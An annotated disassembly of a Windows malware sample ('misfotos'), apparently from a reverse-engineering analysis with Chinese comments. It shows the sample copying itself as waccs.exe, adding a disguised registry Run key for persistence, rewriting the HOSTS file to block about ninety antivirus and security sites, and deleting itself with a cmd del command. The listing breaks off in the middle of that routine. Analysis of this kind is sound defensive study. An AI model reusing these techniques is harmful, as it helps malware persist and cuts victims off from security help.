00402CEA FF15 8C804000 CALL DWORD PTR DS:[40808C] ; kernel32.SetFileAttributesA(设置文件属性为:只读、系统、隐藏).
00402CF0 6A 00 PUSH 0
00402CF2 6A 00 PUSH 0
00402CF4 6A 00 PUSH 0
00402CF6 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]
00402CFC 50 PUSH EAX ; FileName = "C:\WINDOWS\system32\waccs.exe"
00402CFD 68 C4914000 PUSH misfotos.004091C4 ; ASCII "open"
00402D02 6A 00 PUSH 0
00402D04 FF15 74814000 CALL DWORD PTR DS:[408174] ; SHELL32.ShellExecuteA(调用运行拷贝后的病毒程序"waccs.exe").
00402D0A E8 61060000 CALL misfotos.00403370 ; 在HOSTS域名映像劫持文件中添加N个安全网站域名地址,不让用户访问这些网站.
00402D0F E8 F9120000 CALL misfotos.0040400D ; 安装程序关闭退出,并执行自我删除操作.
00402D14 FF15 88804000 CALL DWORD PTR DS:[408088] ; ntdll.RtlGetLastWin32Error(如果s2 == s1,则该病毒程序从这里开始执行恶意操作.)
----------------------------------------------------------
在注册表中添加病毒启动项:
00404170 55 PUSH EBP
00404171 8BEC MOV EBP,ESP
00404173 81EC 8C000000 SUB ESP,8C
00404179 6A 00 PUSH 0
0040417B 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
0040417E 50 PUSH EAX
0040417F 6A 00 PUSH 0
00404181 68 3F000F00 PUSH 0F003F
00404186 6A 00 PUSH 0
00404188 6A 00 PUSH 0
0040418A 6A 00 PUSH 0
0040418C 68 CAFEBB29 PUSH 29BBFECA
00404191 8D4D CC LEA ECX,DWORD PTR SS:[EBP-34]
00404194 E8 4C060000 CALL misfotos.004047E5 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
00404199 50 PUSH EAX ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
0040419A 68 02000080 PUSH 80000002
0040419F FF15 08804000 CALL DWORD PTR DS:[408008] ; ADVAPI32.RegCreateKeyExA(hKey = HKEY_LOCAL_MACHINE).
004041A5 8D4D CC LEA ECX,DWORD PTR SS:[EBP-34]
004041A8 E8 08010000 CALL misfotos.004042B5 ; 清除内存数据.
004041AD 837D 08 00 CMP DWORD PTR SS:[EBP+8],0
004041B1 74 32 JE SHORT misfotos.004041E5
004041B3 FF75 08 PUSH DWORD PTR SS:[EBP+8] ; String = "waccs.exe"
004041B6 FF15 D8804000 CALL DWORD PTR DS:[4080D8] ; kernel32.lstrlenA
004041BC 50 PUSH EAX
004041BD FF75 08 PUSH DWORD PTR SS:[EBP+8]
004041C0 6A 01 PUSH 1
004041C2 6A 00 PUSH 0
004041C4 68 4E9127A1 PUSH A127914E
004041C9 8D4D A0 LEA ECX,DWORD PTR SS:[EBP-60]
004041CC E8 74060000 CALL misfotos.00404845 ; ASCII "Windows Activation Control Center Service"
004041D1 50 PUSH EAX ; ASCII "Windows Activation Control Center Service"
004041D2 FF75 FC PUSH DWORD PTR SS:[EBP-4]
004041D5 FF15 04804000 CALL DWORD PTR DS:[408004] ; ADVAPI32.RegSetValueExA
004041DB 8D4D A0 LEA ECX,DWORD PTR SS:[EBP-60]
004041DE E8 FA000000 CALL misfotos.004042DD ; 清除内存数据.
004041E3 EB 25 JMP SHORT misfotos.0040420A
004041E5 68 7A9127A1 PUSH A127917A
004041EA 8D8D 74FFFFFF LEA ECX,DWORD PTR SS:[EBP-8C]
004041F0 E8 50060000 CALL misfotos.00404845 ; 清除内存数据.
004041F5 50 PUSH EAX
004041F6 FF75 FC PUSH DWORD PTR SS:[EBP-4]
004041F9 FF15 00804000 CALL DWORD PTR DS:[408000] ; ADVAPI32.RegDeleteValueA
004041FF 8D8D 74FFFFFF LEA ECX,DWORD PTR SS:[EBP-8C]
00404205 E8 D3000000 CALL misfotos.004042DD ; 清除内存数据.
0040420A FF75 FC PUSH DWORD PTR SS:[EBP-4]
0040420D FF15 18804000 CALL DWORD PTR DS:[408018] ; ADVAPI32.RegCloseKey
00404213 C9 LEAVE
00404214 C3 RETN ; 返回.
在HOSTS域名映像劫持文件中添加N个安全网站域名地址,不让用户访问这些网站:
00403370 55 PUSH EBP
00403371 8BEC MOV EBP,ESP
00403373 81EC E0030000 SUB ESP,3E0
00403379 68 04010000 PUSH 104
0040337E 6A 00 PUSH 0
00403380 8D85 B4FCFFFF LEA EAX,DWORD PTR SS:[EBP-34C]
00403386 50 PUSH EAX
00403387 E8 AE3C0000 CALL misfotos.0040703A ; JMP 到 msvcrt.memset
0040338C 83C4 0C ADD ESP,0C
0040338F 68 04010000 PUSH 104
00403394 8D85 B4FCFFFF LEA EAX,DWORD PTR SS:[EBP-34C]
0040339A 50 PUSH EAX
0040339B FF15 94804000 CALL DWORD PTR DS:[408094] ; kernel32.GetSystemDirectoryA(获取系统SYSTEM32文件夹路径名).
004033A1 68 04010000 PUSH 104
004033A6 68 E6430183 PUSH 830143E6
004033AB 8D8D A0FCFFFF LEA ECX,DWORD PTR SS:[EBP-360]
004033B1 E8 4F0F0000 CALL misfotos.00404305 ; ASCII "\drivers\etc\hosts"
004033B6 50 PUSH EAX ; ASCII "\drivers\etc\hosts"
004033B7 8D85 B4FCFFFF LEA EAX,DWORD PTR SS:[EBP-34C]
004033BD 50 PUSH EAX ; ASCII "C:\WINDOWS\system32"
004033BE E8 6B3C0000 CALL misfotos.0040702E ; JMP 到 msvcrt.strncat(ASCII "C:\WINDOWS\system32\drivers\etc\hosts").
004033C3 83C4 0C ADD ESP,0C
004033C6 8D8D A0FCFFFF LEA ECX,DWORD PTR SS:[EBP-360]
004033CC E8 C5EAFFFF CALL misfotos.00401E96 ; 清除内存数据.
004033D1 68 38924000 PUSH misfotos.00409238 ; /mode = "w"
004033D6 8D85 B4FCFFFF LEA EAX,DWORD PTR SS:[EBP-34C]
004033DC 50 PUSH EAX ; |path = "C:\WINDOWS\system32\drivers\etc\hosts"
004033DD E8 D83C0000 CALL misfotos.004070BA ; JMP 到 msvcrt.fopen(打开HOSTS域名映像劫持文件)
004033E2 59 POP ECX
004033E3 59 POP ECX
004033E4 8985 B8FDFFFF MOV DWORD PTR SS:[EBP-248],EAX
004033EA 83BD B8FDFFFF 0>CMP DWORD PTR SS:[EBP-248],0
004033F1 75 07 JNZ SHORT misfotos.004033FA
004033F3 32C0 XOR AL,AL
004033F5 E9 18060000 JMP misfotos.00403A12
004033FA 68 AF305D14 PUSH 145D30AF
004033FF 8D8D 70FCFFFF LEA ECX,DWORD PTR SS:[EBP-390]
00403405 E8 5B0F0000 CALL misfotos.00404365 ; ASCII "# Copyright (c) 1993-1999 Microsoft Corp.
#
"
0040340A 50 PUSH EAX ; /format = "# Copyright (c) 1993-1999 Microsoft Corp.
#
"
0040340B FFB5 B8FDFFFF PUSH DWORD PTR SS:[EBP-248] ; |stream = msvcrt.77C2FCE0
00403411 E8 9E3C0000 CALL misfotos.004070B4 ; JMP 到 msvcrt.fprintf
00403416 59 POP ECX
00403417 59 POP ECX
00403418 8D8D 70FCFFFF LEA ECX,DWORD PTR SS:[EBP-390]
0040341E E8 F20D0000 CALL misfotos.00404215 ; 清除内存数据.
00403423 68 981A4325 PUSH 25431A98
00403428 8D8D 20FCFFFF LEA ECX,DWORD PTR SS:[EBP-3E0]
0040342E E8 920F0000 CALL misfotos.004043C5 ; ASCII "# This is a sample LMHOSTS file used by the Microsoft TCP/IP for Windows.
#
"
00403433 50 PUSH EAX ; /format = "# This is a sample LMHOSTS file used by the Microsoft TCP/IP for Windows.
#
"
00403434 FFB5 B8FDFFFF PUSH DWORD PTR SS:[EBP-248] ; |stream = msvcrt.77C2FCE0
0040343A E8 753C0000 CALL misfotos.004070B4 ; JMP 到 msvcrt.fprintf
0040343F 59 POP ECX
00403440 59 POP ECX
00403441 8D8D 20FCFFFF LEA ECX,DWORD PTR SS:[EBP-3E0]
00403447 E8 F10D0000 CALL misfotos.0040423D ; 清除内存数据.
0040344C C785 C0FDFFFF B>MOV DWORD PTR SS:[EBP-240],misfotos.0040>; merijn.org
00403456 C785 C4FDFFFF C>MOV DWORD PTR SS:[EBP-23C],misfotos.0040>; www.merijn.org
00403460 C785 C8FDFFFF D>MOV DWORD PTR SS:[EBP-238],misfotos.0040>; www.spywareinfo.comspywareinfo.comwww.spybot.infospybot.infowww.viruslist.com
0040346A C785 CCFDFFFF E>MOV DWORD PTR SS:[EBP-234],misfotos.0040>; spywareinfo.comwww.spybot.infospybot.infowww.viruslist.com
00403474 C785 D0FDFFFF F>MOV DWORD PTR SS:[EBP-230],misfotos.0040>; www.spybot.infospybot.infowww.viruslist.com
0040347E C785 D4FDFFFF 0>MOV DWORD PTR SS:[EBP-22C],misfotos.0040>; spybot.infowww.viruslist.com
00403488 C785 D8FDFFFF 1>MOV DWORD PTR SS:[EBP-228],misfotos.0040>; www.viruslist.com
00403492 C785 DCFDFFFF 2>MOV DWORD PTR SS:[EBP-224],misfotos.0040>; viruslist.com
0040349C C785 E0FDFFFF 3>MOV DWORD PTR SS:[EBP-220],misfotos.0040>; www.hijackthis.de
004034A6 C785 E4FDFFFF 5>MOV DWORD PTR SS:[EBP-21C],misfotos.0040>; hijackthis.de
004034B0 C785 E8FDFFFF 6>MOV DWORD PTR SS:[EBP-218],misfotos.0040>; www.majorgeeks.com
004034BA C785 ECFDFFFF 7>MOV DWORD PTR SS:[EBP-214],misfotos.0040>; majorgeeks.com
004034C4 C785 F0FDFFFF 8>MOV DWORD PTR SS:[EBP-210],misfotos.0040>; www.virustotal.com
004034CE C785 F4FDFFFF 9>MOV DWORD PTR SS:[EBP-20C],misfotos.0040>; virustotal.com
004034D8 C785 F8FDFFFF A>MOV DWORD PTR SS:[EBP-208],misfotos.0040>; kaspersky.com
004034E2 C785 FCFDFFFF B>MOV DWORD PTR SS:[EBP-204],misfotos.0040>; kaspersky-labs.com
004034EC C785 00FEFFFF C>MOV DWORD PTR SS:[EBP-200],misfotos.0040>; www.kaspersky.com
004034F6 C785 04FEFFFF E>MOV DWORD PTR SS:[EBP-1FC],misfotos.0040>; www.sophos.com
00403500 C785 08FEFFFF F>MOV DWORD PTR SS:[EBP-1F8],misfotos.0040>; sophos
0040350A C785 0CFEFFFF F>MOV DWORD PTR SS:[EBP-1F4],misfotos.0040>; securityresponse.symantec.com
00403514 C785 10FEFFFF 1>MOV DWORD PTR SS:[EBP-1F0],misfotos.0040>; symantec.com
0040351E C785 14FEFFFF 2>MOV DWORD PTR SS:[EBP-1EC],misfotos.0040>; www.symantec.com
00403528 C785 18FEFFFF 3>MOV DWORD PTR SS:[EBP-1E8],misfotos.0040>; updates.symantec.com
00403532 C785 1CFEFFFF 5>MOV DWORD PTR SS:[EBP-1E4],misfotos.0040>; liveupdate.symantecliveupdate.com
0040353C C785 20FEFFFF 7>MOV DWORD PTR SS:[EBP-1E0],misfotos.0040>; liveupdate.symantec.comcustomer.symantec.com
00403546 C785 24FEFFFF 9>MOV DWORD PTR SS:[EBP-1DC],misfotos.0040>; customer.symantec.com
00403550 C785 28FEFFFF A>MOV DWORD PTR SS:[EBP-1D8],misfotos.0040>; update.symantec.comwww.mcafee.com
0040355A C785 2CFEFFFF B>MOV DWORD PTR SS:[EBP-1D4],misfotos.0040>; www.mcafee.com
00403564 C785 30FEFFFF C>MOV DWORD PTR SS:[EBP-1D0],misfotos.0040>; mcafee.com
0040356E C785 34FEFFFF D>MOV DWORD PTR SS:[EBP-1CC],misfotos.0040>; rads.mcafee.commast.mcafee.comdownload.mcafee.comdispatch.mcafee.comus.mcafee.com
00403578 C785 38FEFFFF E>MOV DWORD PTR SS:[EBP-1C8],misfotos.0040>; mast.mcafee.comdownload.mcafee.comdispatch.mcafee.comus.mcafee.com
00403582 C785 3CFEFFFF F>MOV DWORD PTR SS:[EBP-1C4],misfotos.0040>; download.mcafee.comdispatch.mcafee.comus.mcafee.com
0040358C C785 40FEFFFF 0>MOV DWORD PTR SS:[EBP-1C0],misfotos.0040>; dispatch.mcafee.comus.mcafee.com
00403596 C785 44FEFFFF 2>MOV DWORD PTR SS:[EBP-1BC],misfotos.0040>; us.mcafee.com
004035A0 C785 48FEFFFF 3>MOV DWORD PTR SS:[EBP-1B8],misfotos.0040>; www.trendsecure.comtrendsecure.comwww.avp.comavp.comanalysis.seclab.tuwien.ac.at
004035AA C785 4CFEFFFF 4>MOV DWORD PTR SS:[EBP-1B4],misfotos.0040>; trendsecure.comwww.avp.comavp.comanalysis.seclab.tuwien.ac.at
004035B4 C785 50FEFFFF 5>MOV DWORD PTR SS:[EBP-1B0],misfotos.0040>; www.avp.comavp.comanalysis.seclab.tuwien.ac.at
004035BE C785 54FEFFFF 6>MOV DWORD PTR SS:[EBP-1AC],misfotos.0040>; avp.comanalysis.seclab.tuwien.ac.at
004035C8 C785 58FEFFFF 6>MOV DWORD PTR SS:[EBP-1A8],misfotos.0040>; analysis.seclab.tuwien.ac.at
004035D2 C785 5CFEFFFF 8>MOV DWORD PTR SS:[EBP-1A4],misfotos.0040>; www.bleepingcomputer.com
004035DC C785 60FEFFFF A>MOV DWORD PTR SS:[EBP-1A0],misfotos.0040>; bleepingcomputer.com
004035E6 C785 64FEFFFF B>MOV DWORD PTR SS:[EBP-19C],misfotos.0040>; guru0.grisoft.cz
004035F0 C785 68FEFFFF D>MOV DWORD PTR SS:[EBP-198],misfotos.0040>; guru1.grisoft.cz
004035FA C785 6CFEFFFF E>MOV DWORD PTR SS:[EBP-194],misfotos.0040>; guru2.grisoft.cz
00403604 C785 70FEFFFF F>MOV DWORD PTR SS:[EBP-190],misfotos.0040>; guru3.grisoft.cz
0040360E C785 74FEFFFF 0>MOV DWORD PTR SS:[EBP-18C],misfotos.0040>; guru4.grisoft.cz
00403618 C785 78FEFFFF 2>MOV DWORD PTR SS:[EBP-188],misfotos.0040>; guru5.grisoft.cz
00403622 C785 7CFEFFFF 3>MOV DWORD PTR SS:[EBP-184],misfotos.0040>; download.f-secure.com
0040362C C785 80FEFFFF 4>MOV DWORD PTR SS:[EBP-180],misfotos.0040>; www.download.f-secure.com
00403636 C785 84FEFFFF 6>MOV DWORD PTR SS:[EBP-17C],misfotos.0040>; avg-antivirus.net
00403640 C785 88FEFFFF 7>MOV DWORD PTR SS:[EBP-178],misfotos.0040>; www.avg-antivirus.net
0040364A C785 8CFEFFFF 9>MOV DWORD PTR SS:[EBP-174],misfotos.0040>; f-secure.com
00403654 C785 90FEFFFF A>MOV DWORD PTR SS:[EBP-170],misfotos.0040>; www.f-secure.com
0040365E C785 94FEFFFF B>MOV DWORD PTR SS:[EBP-16C],misfotos.0040>; free.grisoft.com
00403668 C785 98FEFFFF C>MOV DWORD PTR SS:[EBP-168],misfotos.0040>; www.free.grisoft.com
00403672 C785 9CFEFFFF E>MOV DWORD PTR SS:[EBP-164],misfotos.0040>; free.avg.com
0040367C C785 A0FEFFFF F>MOV DWORD PTR SS:[EBP-160],misfotos.0040>; www.free.avg.com
00403686 C785 A4FEFFFF 0>MOV DWORD PTR SS:[EBP-15C],misfotos.0040>; avast.com
00403690 C785 A8FEFFFF 1>MOV DWORD PTR SS:[EBP-158],misfotos.0040>; www.avast.com
0040369A C785 ACFEFFFF 2>MOV DWORD PTR SS:[EBP-154],misfotos.0040>; onlinescan.avast.com
004036A4 C785 B0FEFFFF 3>MOV DWORD PTR SS:[EBP-150],misfotos.0040>; www.onlinescan.avast.com
004036AE C785 B4FEFFFF 5>MOV DWORD PTR SS:[EBP-14C],misfotos.0040>; housecall.trendmicro.com
004036B8 C785 B8FEFFFF 7>MOV DWORD PTR SS:[EBP-148],misfotos.0040>; www.housecall.trendmicro.com
004036C2 C785 BCFEFFFF 9>MOV DWORD PTR SS:[EBP-144],misfotos.0040>; free.avg.com
004036CC C785 C0FEFFFF A>MOV DWORD PTR SS:[EBP-140],misfotos.0040>; www.free.avg.com
004036D6 C785 C4FEFFFF B>MOV DWORD PTR SS:[EBP-13C],misfotos.0040>; bitdefender.comwww.bitdefender.comtrendsecure.comwww.trendsecure.comfuturenow.bitdefender.com
004036E0 C785 C8FEFFFF C>MOV DWORD PTR SS:[EBP-138],misfotos.0040>; www.bitdefender.comtrendsecure.comwww.trendsecure.comfuturenow.bitdefender.com
004036EA C785 CCFEFFFF D>MOV DWORD PTR SS:[EBP-134],misfotos.0040>; trendsecure.comwww.trendsecure.comfuturenow.bitdefender.com
004036F4 C785 D0FEFFFF E>MOV DWORD PTR SS:[EBP-130],misfotos.0040>; www.trendsecure.comfuturenow.bitdefender.com
004036FE C785 D4FEFFFF 0>MOV DWORD PTR SS:[EBP-12C],misfotos.0040>; futurenow.bitdefender.com
00403708 C785 D8FEFFFF 1>MOV DWORD PTR SS:[EBP-128],misfotos.0040>; www.futurenow.bitdefender.com
00403712 C785 DCFEFFFF 3>MOV DWORD PTR SS:[EBP-124],misfotos.0040>; f-prot.com
0040371C C785 E0FEFFFF 4>MOV DWORD PTR SS:[EBP-120],misfotos.0040>; www.f-prot.com
00403726 C785 E4FEFFFF 5>MOV DWORD PTR SS:[EBP-11C],misfotos.0040>; eset.com
00403730 C785 E8FEFFFF 6>MOV DWORD PTR SS:[EBP-118],misfotos.0040>; www.eset.com
0040373A C785 ECFEFFFF 7>MOV DWORD PTR SS:[EBP-114],misfotos.0040>; free-av.comwww.free-av.comavira.com
00403744 C785 F0FEFFFF 8>MOV DWORD PTR SS:[EBP-110],misfotos.0040>; www.free-av.comavira.com
0040374E C785 F4FEFFFF 9>MOV DWORD PTR SS:[EBP-10C],misfotos.0040>; avira.com
00403758 C785 F8FEFFFF 9>MOV DWORD PTR SS:[EBP-108],misfotos.0040>; www.avira.com
00403762 C785 FCFEFFFF A>MOV DWORD PTR SS:[EBP-104],misfotos.0040>; free.avg.com
0040376C C785 00FFFFFF B>MOV DWORD PTR SS:[EBP-100],misfotos.0040>; www.free.avg.com
00403776 C785 04FFFFFF D>MOV DWORD PTR SS:[EBP-FC],misfotos.00409>; antivir.es
00403780 C785 08FFFFFF D>MOV DWORD PTR SS:[EBP-F8],misfotos.00409>; www.antivir.es
0040378A C785 0CFFFFFF E>MOV DWORD PTR SS:[EBP-F4],misfotos.00409>; ikarus.net
00403794 C785 10FFFFFF F>MOV DWORD PTR SS:[EBP-F0],misfotos.00409>; www.ikarus.net
0040379E C785 14FFFFFF 0>MOV DWORD PTR SS:[EBP-EC],misfotos.00409>; prevx.com
004037A8 C785 18FFFFFF 1>MOV DWORD PTR SS:[EBP-E8],misfotos.00409>; www.prevx.com
004037B2 C785 1CFFFFFF 2>MOV DWORD PTR SS:[EBP-E4],misfotos.00409>; 2-spyware.com
004037BC C785 20FFFFFF 3>MOV DWORD PTR SS:[EBP-E0],misfotos.00409>; www.2-spyware.com
004037C6 C785 24FFFFFF 4>MOV DWORD PTR SS:[EBP-DC],misfotos.00409>; castlecops.com
004037D0 C785 28FFFFFF 5>MOV DWORD PTR SS:[EBP-D8],misfotos.00409>; www.castlecops.com
004037DA C785 2CFFFFFF 6>MOV DWORD PTR SS:[EBP-D4],misfotos.00409>; virusinfo.prevx.comwww.virusinfo.prevx.comforums.majorgeeks.com
004037E4 C785 30FFFFFF 8>MOV DWORD PTR SS:[EBP-D0],misfotos.00409>; www.virusinfo.prevx.comforums.majorgeeks.com
004037EE C785 34FFFFFF 9>MOV DWORD PTR SS:[EBP-CC],misfotos.00409>; forums.majorgeeks.com
004037F8 C785 38FFFFFF B>MOV DWORD PTR SS:[EBP-C8],misfotos.00409>; www.forums.majorgeeks.com
00403802 C785 3CFFFFFF C>MOV DWORD PTR SS:[EBP-C4],misfotos.00409>; eradicatespyware.net
0040380C C785 40FFFFFF E>MOV DWORD PTR SS:[EBP-C0],misfotos.00409>; www.eradicatespyware.net
00403816 C785 44FFFFFF 0>MOV DWORD PTR SS:[EBP-BC],misfotos.00409>; fortinet.com
00403820 C785 48FFFFFF 1>MOV DWORD PTR SS:[EBP-B8],misfotos.00409>; www.fortinet.com
0040382A C785 4CFFFFFF 2>MOV DWORD PTR SS:[EBP-B4],misfotos.00409>; fortiguardcenter.com
00403834 C785 50FFFFFF 3>MOV DWORD PTR SS:[EBP-B0],misfotos.00409>; www.fortiguardcenter.com
0040383E C785 54FFFFFF 5>MOV DWORD PTR SS:[EBP-AC],misfotos.00409>; trendmicro.com
00403848 C785 58FFFFFF 6>MOV DWORD PTR SS:[EBP-A8],misfotos.00409>; www.trendmicro.com
00403852 C785 5CFFFFFF 7>MOV DWORD PTR SS:[EBP-A4],misfotos.00409>; www.safer-networking.org
0040385C C785 60FFFFFF 9>MOV DWORD PTR SS:[EBP-A0],misfotos.00409>; safer-networking.org
00403866 C785 64FFFFFF B>MOV DWORD PTR SS:[EBP-9C],misfotos.00409>; auditmypc.com
00403870 C785 68FFFFFF C>MOV DWORD PTR SS:[EBP-98],misfotos.00409>; www.auditmypc.com
0040387A C785 6CFFFFFF D>MOV DWORD PTR SS:[EBP-94],misfotos.00409>; pctools.comwww.pctools.comfirewallguide.com
00403884 C785 70FFFFFF E>MOV DWORD PTR SS:[EBP-90],misfotos.00409>; www.pctools.comfirewallguide.com
0040388E C785 74FFFFFF F>MOV DWORD PTR SS:[EBP-8C],misfotos.00409>; firewallguide.com
00403898 C785 78FFFFFF 0>MOV DWORD PTR SS:[EBP-88],misfotos.00409>; www.firewallguide.com
004038A2 C785 7CFFFFFF 1>MOV DWORD PTR SS:[EBP-84],misfotos.00409>; spywaredb.com
004038AC C745 80 2C9B400>MOV DWORD PTR SS:[EBP-80],misfotos.00409>; www.spywaredb.com
004038B3 C745 84 409B400>MOV DWORD PTR SS:[EBP-7C],misfotos.00409>; virusspy.com
004038BA C745 88 509B400>MOV DWORD PTR SS:[EBP-78],misfotos.00409>; www.virusspy.com
004038C1 C745 8C 649B400>MOV DWORD PTR SS:[EBP-74],misfotos.00409>; eradicatespyware.net
004038C8 C745 90 7C9B400>MOV DWORD PTR SS:[EBP-70],misfotos.00409>; www.eradicatespyware.net
004038CF C745 94 989B400>MOV DWORD PTR SS:[EBP-6C],misfotos.00409>; spywareterminator.com
004038D6 C745 98 B09B400>MOV DWORD PTR SS:[EBP-68],misfotos.00409>; www.spywareterminator.com
004038DD C745 9C CC9B400>MOV DWORD PTR SS:[EBP-64],misfotos.00409>; freespywareremoval.infowww.freespywareremoval.infoantivirus.about.comwww.antivirus.about.comantivirus.comodo.com
004038E4 C745 A0 E49B400>MOV DWORD PTR SS:[EBP-60],misfotos.00409>; www.freespywareremoval.infoantivirus.about.comwww.antivirus.about.comantivirus.comodo.com
004038EB C745 A4 009C400>MOV DWORD PTR SS:[EBP-5C],misfotos.00409>; antivirus.about.comwww.antivirus.about.comantivirus.comodo.com
004038F2 C745 A8 149C400>MOV DWORD PTR SS:[EBP-58],misfotos.00409>; www.antivirus.about.comantivirus.comodo.com
004038F9 C745 AC 2C9C400>MOV DWORD PTR SS:[EBP-54],misfotos.00409>; antivirus.comodo.com
00403900 C745 B0 449C400>MOV DWORD PTR SS:[EBP-50],misfotos.00409>; www.antivirus.comodo.com
00403907 C745 B4 609C400>MOV DWORD PTR SS:[EBP-4C],misfotos.00409>; clamav.net
0040390E C745 B8 6C9C400>MOV DWORD PTR SS:[EBP-48],misfotos.00409>; www.clamav.net
00403915 C745 BC 7C9C400>MOV DWORD PTR SS:[EBP-44],misfotos.00409>; pandasecurity.com
0040391C C745 C0 909C400>MOV DWORD PTR SS:[EBP-40],misfotos.00409>; www.pandasecurity.com
00403923 C745 C4 A89C400>MOV DWORD PTR SS:[EBP-3C],misfotos.00409>; clamwin.comwww.clamwin.comshop.symantecstore.com
0040392A C745 C8 B49C400>MOV DWORD PTR SS:[EBP-38],misfotos.00409>; www.clamwin.comshop.symantecstore.com
00403931 C745 CC C49C400>MOV DWORD PTR SS:[EBP-34],misfotos.00409>; shop.symantecstore.com
00403938 C745 D0 DC9C400>MOV DWORD PTR SS:[EBP-30],misfotos.00409>; www.shop.symantecstore.com
0040393F C745 D4 F89C400>MOV DWORD PTR SS:[EBP-2C],misfotos.00409>; shop.ca.comwww.shop.ca.comca.com
00403946 C745 D8 049D400>MOV DWORD PTR SS:[EBP-28],misfotos.00409>; www.shop.ca.comca.com
0040394D C745 DC 149D400>MOV DWORD PTR SS:[EBP-24],misfotos.00409>; ca.com
00403954 C745 E0 1C9D400>MOV DWORD PTR SS:[EBP-20],misfotos.00409>; www.ca.com
0040395B C745 E4 289D400>MOV DWORD PTR SS:[EBP-1C],misfotos.00409>; networkworld.com
00403962 C745 E8 3C9D400>MOV DWORD PTR SS:[EBP-18],misfotos.00409>; www.networkworld.com
00403969 C745 EC 549D400>MOV DWORD PTR SS:[EBP-14],misfotos.00409>; norman.com
00403970 C745 F0 609D400>MOV DWORD PTR SS:[EBP-10],misfotos.00409>; www.norman.com
00403977 C745 F4 709D400>MOV DWORD PTR SS:[EBP-C],misfotos.00409D>; grisoft.comwww.grisoft.com\n
0040397E C745 F8 7C9D400>MOV DWORD PTR SS:[EBP-8],misfotos.00409D>; www.grisoft.com\n
00403985 8365 FC 00 AND DWORD PTR SS:[EBP-4],0
00403989 83A5 BCFDFFFF 0>AND DWORD PTR SS:[EBP-244],0
00403990 EB 0D JMP SHORT misfotos.0040399F
00403992 8B85 BCFDFFFF MOV EAX,DWORD PTR SS:[EBP-244]
00403998 40 INC EAX
00403999 8985 BCFDFFFF MOV DWORD PTR SS:[EBP-244],EAX
0040399F 83BD BCFDFFFF 5>CMP DWORD PTR SS:[EBP-244],5A
004039A6 7D 14 JGE SHORT misfotos.004039BC
004039A8 68 8C9D4000 PUSH misfotos.00409D8C ; \n
004039AD FFB5 B8FDFFFF PUSH DWORD PTR SS:[EBP-248]
004039B3 E8 FC360000 CALL misfotos.004070B4 ; JMP 到 msvcrt.fprintf
004039B8 59 POP ECX
004039B9 59 POP ECX
004039BA ^ EB D6 JMP SHORT misfotos.00403992 ; 循环插入"\n".
004039BC 83A5 BCFDFFFF 0>AND DWORD PTR SS:[EBP-244],0
004039C3 EB 0D JMP SHORT misfotos.004039D2
004039C5 8B85 BCFDFFFF MOV EAX,DWORD PTR SS:[EBP-244]
004039CB 40 INC EAX
004039CC 8985 BCFDFFFF MOV DWORD PTR SS:[EBP-244],EAX
004039D2 8B85 BCFDFFFF MOV EAX,DWORD PTR SS:[EBP-244]
004039D8 83BC85 C0FDFFFF>CMP DWORD PTR SS:[EBP+EAX*4-240],0
004039E0 74 22 JE SHORT misfotos.00403A04
004039E2 8B85 BCFDFFFF MOV EAX,DWORD PTR SS:[EBP-244]
004039E8 FFB485 C0FDFFFF PUSH DWORD PTR SS:[EBP+EAX*4-240]
004039EF 68 909D4000 PUSH misfotos.00409D90 ; 127.0.0.1\t%s\n
004039F4 FFB5 B8FDFFFF PUSH DWORD PTR SS:[EBP-248]
004039FA E8 B5360000 CALL misfotos.004070B4 ; JMP 到 msvcrt.fprintf
004039FF 83C4 0C ADD ESP,0C
00403A02 ^ EB C1 JMP SHORT misfotos.004039C5 ; 循环插入"127.0.0.1\t%s\n".
00403A04 FFB5 B8FDFFFF PUSH DWORD PTR SS:[EBP-248]
00403A0A E8 9F360000 CALL misfotos.004070AE ; JMP 到 msvcrt.fclose(关闭HOSTS域名映像劫持文件)
00403A0F 59 POP ECX
00403A10 B0 01 MOV AL,1
00403A12 C9 LEAVE
00403A13 C3 RETN ; 返回.
安装程序关闭退出,并执行自我删除操作:
0040400D 55 PUSH EBP
0040400E 8BEC MOV EBP,ESP
00404010 81EC 48030000 SUB ESP,348
00404016 68 04010000 PUSH 104
0040401B 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00404021 50 PUSH EAX
00404022 6A 00 PUSH 0
00404024 FF15 9C804000 CALL DWORD PTR DS:[40809C] ; kernel32.GetModuleHandleA
0040402A 50 PUSH EAX
0040402B FF15 98804000 CALL DWORD PTR DS:[408098] ; kernel32.GetModuleFileNameA(获取程序自身当前路径名).
00404031 68 04010000 PUSH 104
00404036 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
0040403C 50 PUSH EAX
0040403D 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00404043 50 PUSH EAX
00404044 FF15 D4804000 CALL DWORD PTR DS:[4080D4] ; kernel32.GetShortPathNameA(将Windows中的长文件名转换为DOS下的短文件名).
0040404A 68 04010000 PUSH 104
0040404F 8D85 B8FCFFFF LEA EAX,DWORD PTR SS:[EBP-348]
00404055 50 PUSH EAX
00404056 68 389E4000 PUSH misfotos.00409E38 ; comspec/c del > nul
0040405B FF15 D0804000 CALL DWORD PTR DS:[4080D0] ; kernel32.GetEnvironmentVariableA
00404061 6A 04 PUSH 4
00404063 6A 00 PUSH 0
00404065 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
0040406B 50 PUSH EAX ; "C:\DOCUME~1\CODERU~1\桌面\VIRUS.EXE"
0040406C FF15 CC804000 CALL DWORD PTR DS:[4080CC] ; kernel32.MoveFileExA
00404072 68 04010000 PUSH 104
00404077 68 409E4000 PUSH misfotos.00409E40 ; /c del > nul
0040407C 8D85 F8FDFFFF LEA EAX,DWORD PTR SS:[EBP-208]
00404082 50 PUSH EAX
00404083 E8 14300000 CALL misfotos.0040709C ; JMP 到 msvcrt.strncpy
00404088 83C4 0C ADD ESP,0C
0040408B 68 04010000 PUSH 104 ; /maxlen = 104 (260.)
00404090 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00404096 50 PUSH EAX ; |src = "C:\DOCUME~1\CODERU~1\桌面\VIRUS.EXE"
00404097 8D85 F8FDFFFF LEA EAX,DWORD PTR SS:[EBP-208]
0040409D 50 PUSH EAX ; |dest = "/c del "
0040409E E8 8B2F0000 CALL misfotos.0040702E ; JMP 到 msvcrt.strncat
